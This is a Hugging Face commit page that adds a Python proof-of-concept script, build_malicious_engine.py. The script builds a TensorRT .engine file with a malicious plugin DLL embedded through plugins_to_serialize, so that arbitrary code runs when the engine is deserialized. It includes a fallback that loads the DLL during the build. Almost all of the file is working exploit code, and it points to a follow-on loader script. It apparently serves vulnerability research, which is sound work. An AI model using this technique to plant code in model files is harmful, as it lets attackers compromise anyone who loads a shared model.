treforbenbow commited on
Commit
a86b88f
·
verified ·
1 Parent(s): 7363d4f

Upload build_malicious_engine.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. build_malicious_engine.py +123 -0
build_malicious_engine.py ADDED
@@ -0,0 +1,123 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ TensorRT ACE PoC - Step 1: Build a malicious .engine file with embedded plugin DLL.
3
+
4
+ This script:
5
+ 1. Creates a simple identity network using TensorRT's network API
6
+ 2. Serializes the malicious plugin DLL into the engine file via plugins_to_serialize
7
+ 3. Saves the resulting .engine file
8
+
9
+ The .engine file will contain the embedded DLL that executes arbitrary code
10
+ when deserialized by TensorRT.
11
+ """
12
+
13
+ import os
14
+ import sys
15
+ import tensorrt as trt
16
+
17
+ def build_malicious_engine():
18
+ PLUGIN_DLL = os.path.join(os.path.dirname(__file__), "malicious_plugin.dll")
19
+ ENGINE_FILE = os.path.join(os.path.dirname(__file__), "malicious_model.engine")
20
+
21
+ if not os.path.exists(PLUGIN_DLL):
22
+ print(f"ERROR: Plugin DLL not found: {PLUGIN_DLL}")
23
+ return False
24
+
25
+ logger = trt.Logger(trt.Logger.VERBOSE)
26
+
27
+ # Create builder
28
+ builder = trt.Builder(logger)
29
+ if builder is None:
30
+ print("ERROR: Failed to create builder")
31
+ return False
32
+
33
+ # NOTE: We skip load_library() - just embed the DLL directly.
34
+ # TensorRT reads the file from disk for plugins_to_serialize.
35
+ print(f"[*] Plugin DLL: {PLUGIN_DLL} ({os.path.getsize(PLUGIN_DLL)} bytes)")
36
+
37
+ # Create a simple network (identity - just input -> output)
38
+ network = builder.create_network(
39
+ 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
40
+ )
41
+ if network is None:
42
+ print("ERROR: Failed to create network")
43
+ return False
44
+
45
+ # Add a simple identity layer
46
+ input_tensor = network.add_input("input", trt.float32, (1, 3, 32, 32))
47
+ identity = network.add_identity(input_tensor)
48
+ identity.get_output(0).name = "output"
49
+ network.mark_output(identity.get_output(0))
50
+
51
+ print("[*] Simple identity network created")
52
+
53
+ # Configure builder
54
+ config = builder.create_builder_config()
55
+ config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20) # 1MB
56
+
57
+ # KEY STEP: Serialize the malicious plugin DLL into the engine
58
+ print(f"[*] Setting plugins_to_serialize: {PLUGIN_DLL}")
59
+ config.plugins_to_serialize = [PLUGIN_DLL]
60
+
61
+ # Build the serialized network
62
+ print("[*] Building engine (this may take a moment)...")
63
+ serialized_engine = builder.build_serialized_network(network, config)
64
+ if serialized_engine is None:
65
+ print("ERROR: Failed to build serialized engine")
66
+ print("[*] Trying approach 2: load_library first, then serialize...")
67
+
68
+ # Approach 2: load the library first (this triggers DllMain during build)
69
+ registry = builder.get_plugin_registry()
70
+ handle = registry.load_library(PLUGIN_DLL)
71
+ print(f"[*] load_library result: {handle}")
72
+
73
+ # Rebuild
74
+ builder2 = trt.Builder(logger)
75
+ network2 = builder2.create_network(
76
+ 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
77
+ )
78
+ input_tensor2 = network2.add_input("input", trt.float32, (1, 3, 32, 32))
79
+ identity2 = network2.add_identity(input_tensor2)
80
+ identity2.get_output(0).name = "output"
81
+ network2.mark_output(identity2.get_output(0))
82
+
83
+ config2 = builder2.create_builder_config()
84
+ config2.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20)
85
+ config2.plugins_to_serialize = [PLUGIN_DLL]
86
+
87
+ serialized_engine = builder2.build_serialized_network(network2, config2)
88
+ if serialized_engine is None:
89
+ print("ERROR: Still failed to build engine")
90
+ return False
91
+
92
+ engine_size = serialized_engine.nbytes
93
+ print(f"[+] Engine built successfully! Size: {engine_size} bytes")
94
+
95
+ # Check if engine is larger than expected (should contain the DLL)
96
+ dll_size = os.path.getsize(PLUGIN_DLL)
97
+ print(f"[*] Plugin DLL size: {dll_size} bytes")
98
+ if engine_size > dll_size:
99
+ print(f"[+] Engine is larger than DLL - DLL likely embedded!")
100
+ else:
101
+ print(f"[-] Engine seems too small - DLL might not be embedded")
102
+
103
+ # Save the engine
104
+ with open(ENGINE_FILE, "wb") as f:
105
+ f.write(bytes(serialized_engine))
106
+ print(f"[+] Malicious engine saved to: {ENGINE_FILE}")
107
+
108
+ return True
109
+
110
+
111
+ if __name__ == "__main__":
112
+ # Clean up proof file before build
113
+ proof = os.path.join(os.path.dirname(__file__), "PWNED.txt")
114
+ if os.path.exists(proof):
115
+ os.remove(proof)
116
+
117
+ success = build_malicious_engine()
118
+ if success:
119
+ print("\n[+] STEP 1 COMPLETE: Malicious engine built.")
120
+ print("[*] Next: Run load_malicious_engine.py to test ACE")
121
+ else:
122
+ print("\n[-] STEP 1 FAILED")
123
+ sys.exit(0 if success else 1)